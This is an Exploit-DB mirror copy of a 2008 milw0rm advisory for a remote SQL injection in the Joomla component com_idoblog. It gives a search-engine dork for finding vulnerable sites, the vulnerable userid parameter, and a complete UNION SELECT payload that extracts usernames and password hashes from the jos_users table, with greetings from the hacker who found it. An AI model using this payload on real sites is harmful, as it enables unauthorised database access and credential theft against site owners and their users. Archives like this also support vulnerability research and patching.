exploit-db-mirror/exploits/php/webapps/5730.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

30 lines
No EOL
1 KiB
Text

#########################################################
# #
# Joomla Component idoblog Remote SQL Injection #
# #
#########################################################
########################################
[*] Founded by : His0k4 (Algerian HaCkeR);
[*] Contact: His0k4.hlm[at]gmail.com
[*] Greetz : All friends & muslims HaCkeRs :)
[*] Greetz2 : http://www.palcastle.org/cc/
########################################
[*] Script_Name: "Joomla"
[*] Component_Name: "com_idoblog"
########################################
[*] DORK: inurl:com_idoblog
########################################
[*] P.O.C : /index.php?option=com_idoblog&task=userblog&userid={SQL}
[*] Example: /index.php?option=com_idoblog&task=userblog&userid=<valid_userid> and 1=1 UNION SELECT user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
########################################
# milw0rm.com [2008-06-03]